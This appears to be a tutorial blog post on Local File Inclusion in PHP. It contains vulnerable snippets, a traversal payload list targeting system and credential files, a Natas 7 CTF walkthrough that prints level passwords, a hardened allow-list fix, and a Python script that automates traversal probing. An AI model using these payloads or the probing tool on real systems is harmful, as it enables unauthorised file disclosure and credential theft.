Web exploitation

  • CHS
  • 29th Jul 2018

Local File Inclusion

OWASP:

Local File Inclusion (also known as LFI) allows an attacker to include files on the server side through the web browser. File inclusions are part of every advanced server-side scripting language on the web. LFI is commonly found to affect web applications that rely on a scripting runtime. This occurs mainly due to a bad input validation mechanism, wherein the user's input is passed to the file include commands without proper validation.

Local file inclusion in PHP:

Consider the following example where this attack applies: http://victim_site/abc.php?file=userinput.txt. The file parameter is read from the URL and passed straight to include:

<?php
$file = $_GET['file'];
if(isset($file))
{
    include("pages/$file");   // user-controlled path, no validation at all
}
?>

An attacker can supply malicious input for the "file" parameter to read unintended files from that directory, and can leave the directory altogether with "../" sequences. Input such as "../../../../etc/passwd" discloses the list of system accounts (the password hashes themselves live in /etc/shadow, which the web server user normally cannot read). If the back end appends a file extension, the null byte terminator "%00" can be appended to the input to cut the string off before the extension: everything after it is ignored. Note that this trick only works on PHP versions older than 5.3.4; newer versions refuse to open a path that contains a null byte.

Suppose the ".php" extension is appended on the back end:

<?php
include("include/" . $_GET['testfile'] . ".php");   // extension is forced, but the path is still user-controlled
?>

Supplying testfile=../../../../etc/passwd%00 includes /etc/passwd anyway: the null byte ends the path and the appended ".php" is never seen (again, only on PHP older than 5.3.4).
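The path resolution behind both snippets above, as an added example (not code from the original post): the first function models what include("pages/" . $_GET['file'] . $ext) actually opens for traversal and %00 inputs, including the PHP 5.3.4 cut-off for null bytes; the second is the hardened form, an allow-list of page names followed by a realpath containment check as defence in depth (the same fix in PHP would use in_array() and realpath()). The web root /var/www/html and the allow-list {home, about} are assumptions, not taken from the post.

```python
import os
from urllib.parse import unquote

# Assumed layout of the vulnerable app (the post gives no paths): abc.php sits
# in the web root and includes files from pages/ relative to it.
WEB_ROOT = "/var/www/html"
PAGES_DIR = WEB_ROOT + "/pages"
# Assumed allow-list for the hardened version: the only pages the app serves.
ALLOWED_PAGES = frozenset({"home", "about"})


def vulnerable_include_path(query_value, forced_ext="", php_before_5_3_4=False):
    """Path that include("pages/" . $_GET['file'] . $forced_ext) would open.

    query_value is the raw value from the URL, so "%00" is still encoded; PHP
    decodes it before the include sees it, which unquote() reproduces here.
    """
    raw = unquote(query_value) + forced_ext
    if "\x00" in raw:
        if not php_before_5_3_4:
            # PHP 5.3.4 and later refuse file paths containing NUL.
            raise ValueError("include(): path contains a null byte")
        # Older PHP handed the string to C, which stops at the first NUL, so
        # the appended ".php" was never seen.
        raw = raw.split("\x00", 1)[0]
    # Plain string concatenation, exactly like the PHP, then lexical ".." folding.
    return os.path.normpath(PAGES_DIR + "/" + raw)


def is_inside(directory, path):
    """True if path, after resolving symlinks and "..", lies under directory."""
    directory = os.path.realpath(directory)
    path = os.path.realpath(path)
    return os.path.commonpath([directory, path]) == directory


def hardened_include_path(query_value):
    """Allow-list the page name, then verify containment as defence in depth."""
    name = unquote(query_value)
    if name not in ALLOWED_PAGES:
        # Rejects "../", absolute paths and NUL bytes in one go: none of them
        # is a listed page name.
        raise PermissionError("page not allowed: %r" % name)
    candidate = os.path.join(PAGES_DIR, name + ".php")
    if not is_inside(PAGES_DIR, candidate):
        raise PermissionError("resolved outside pages/: %s" % candidate)
    return candidate


if __name__ == "__main__":
    for value in ("home", "../../../../etc/passwd", "../../../../etc/passwd%00"):
        opened = vulnerable_include_path(value, ".php", php_before_5_3_4=True)
        print("%-30s -> %s" % (value, opened))
        try:
            print("%-30s -> hardened: %s" % ("", hardened_include_path(value)))
        except PermissionError as err:
            print("%-30s -> hardened: %s" % ("", err))
```

The allow-list alone is sufficient; the containment check is there so that a later change which drops the allow-list (say, to support arbitrary page names) still cannot walk out of pages/.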

An attacker can also retrieve files simply by changing the file name in a download parameter. For example:
URL : example/?download=brochure.pdf
The attacker may change brochure.pdf to any other file, such as secrets.txt, passwords.txt, users.txt, etc.

Impact

LFI can lead to compromise of the system, data leakage, etc. The attacker can read and download files and, by including a file whose contents they control, can also run arbitrary code with the privileges of the web server.

Explore it yourself

Create a PHP file with the code given above and explore the different possibilities of the vulnerability.

Some payloads:

  • ../../../../etc/issue
  • ../../../../etc/passwd
  • ../../../../etc/shadow
  • ../../../../etc/group
  • ../../../../etc/hosts
  • ../../../../etc/motd
  • ../../../../etc/mysql/my.cnf
  • ../../../../proc/self/environ
  • ../../../../proc/version
  • ../../../../proc/cmdline
  • ../../../../proc/sched_debug
  • ../../../../proc/mounts
  • ../../../../proc/net/arp
  • ../../../../proc/net/route
  • ../../../../proc/net/tcp
  • ../../../../proc/net/udp

Let's try a challenge

NATAS 7 :

  • USERNAME : natas7
  • PASSWORD : 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

The site is very simple, with only two buttons, but when you click Home or About the URL changes as follows:

[screenshots: the URL after clicking Home and About, showing the page parameter as index.php?page=home and index.php?page=about]

It looks like the PHP file is including the file named by the page parameter. When we check the page source we get the hint:
hint: password for webuser natas8 is in /etc/natas_webpass/

So, let's try to include that file through the URL: index.php?page=/etc/natas_webpass/natas8. Including this file prints the password for the next level on the screen:

password : DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

This is a basic example of Local file inclusion vulnerability.
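A small probing helper that ties the payload list above to the Natas walkthrough, as an added example (not code from the original post): it generates traversal payloads of increasing depth with and without the %00 suffix, builds the request URL the way the post's examples write it, fetches with the HTTP basic auth that Natas levels require, and recognises a successful read by a fingerprint of the target file rather than by eye. The SIGNATURES table and the Natas host name are my assumptions; the sample response bodies are constructed, not captured.

```python
import base64
import re
import urllib.request
from urllib.parse import quote

# Assumed fingerprints for a successful read of a few targets from the list.
SIGNATURES = {
    "/etc/passwd": re.compile(r"^root:[^:\n]*:0:0:", re.M),
    "/proc/version": re.compile(r"Linux version \d"),
    "/proc/self/environ": re.compile(r"(?:^|\x00)(?:PATH|SERVER_SOFTWARE|HTTP_HOST)="),
}
# Natas passwords are 32 alphanumeric characters (see the natas8 one above).
NATAS_PASSWORD = re.compile(r"\b[A-Za-z0-9]{32}\b")

# Constructed responses standing in for a live target (not real captures).
SAMPLE_PASSWD_BODY = ("<html><body>\nroot:x:0:0:root:/root:/bin/bash\n"
                      "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n</body></html>")
SAMPLE_MISS_BODY = "<html><body>Warning: include(): failed to open stream</body></html>"
SAMPLE_NATAS_BODY = ('<html><body>\n<a href="index.php?page=home">Home</a>\n'
                     "DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe\n</body></html>")


def build_payloads(target, max_depth=6, null_byte=False):
    """Absolute path first (include() accepts it, as the Natas level shows),
    then "../" chains of increasing depth, each with an optional NUL suffix."""
    rel = target.lstrip("/")
    payloads = [target] + ["../" * d + rel for d in range(1, max_depth + 1)]
    if null_byte:
        payloads = [p + "\x00" for p in payloads]
    return payloads


def build_url(base_url, param, payload):
    """Attach the payload as the query parameter; "/" stays readable and a
    NUL byte becomes %00, exactly as the post writes it."""
    return "%s?%s=%s" % (base_url, param, quote(payload, safe="/"))


def looks_like_hit(target, body):
    """True when the response carries the fingerprint of the requested file."""
    sig = SIGNATURES.get(target)
    return bool(sig and sig.search(body))


def natas_passwords(body):
    """Every 32-character alphanumeric token in the page, password candidates."""
    return NATAS_PASSWORD.findall(body)


def fetch(url, auth=None, timeout=10):
    """GET the URL, with HTTP basic auth when (user, password) is given."""
    req = urllib.request.Request(url)
    if auth:
        token = base64.b64encode(("%s:%s" % auth).encode()).decode()
        req.add_header("Authorization", "Basic " + token)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def probe(base_url, param, target, auth=None, max_depth=6):
    """Try plain then NUL-suffixed payloads; return (payload, body) on first hit."""
    candidates = build_payloads(target, max_depth) + build_payloads(target, max_depth, null_byte=True)
    for payload in candidates:
        body = fetch(build_url(base_url, param, payload), auth)
        if looks_like_hit(target, body):
            return payload, body
    return None


if __name__ == "__main__":
    # Assumed target URL; the post shows only the path index.php?page=...
    base = "http://natas7.natas.labs.overthewire.org/index.php"
    auth = ("natas7", "7z3hEENjQtflzgnT29q7wAvMNfZdh0i9")
    page = fetch(build_url(base, "page", "/etc/natas_webpass/natas8"), auth)
    print("password candidates:", natas_passwords(page))
    hit = probe(base, "page", "/etc/passwd", auth)
    print("traversal hit:", hit[0] if hit else None)
```

Run it against your own test instance of the vulnerable PHP above before pointing it at a CTF box; fingerprinting the response is what keeps the loop from stopping on an error page that merely echoes the payload back.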


With the info in the post you can try some CTFs where you can explore different aspects of this vulnerability. This is a first shot; I'll try to improve the post in the future.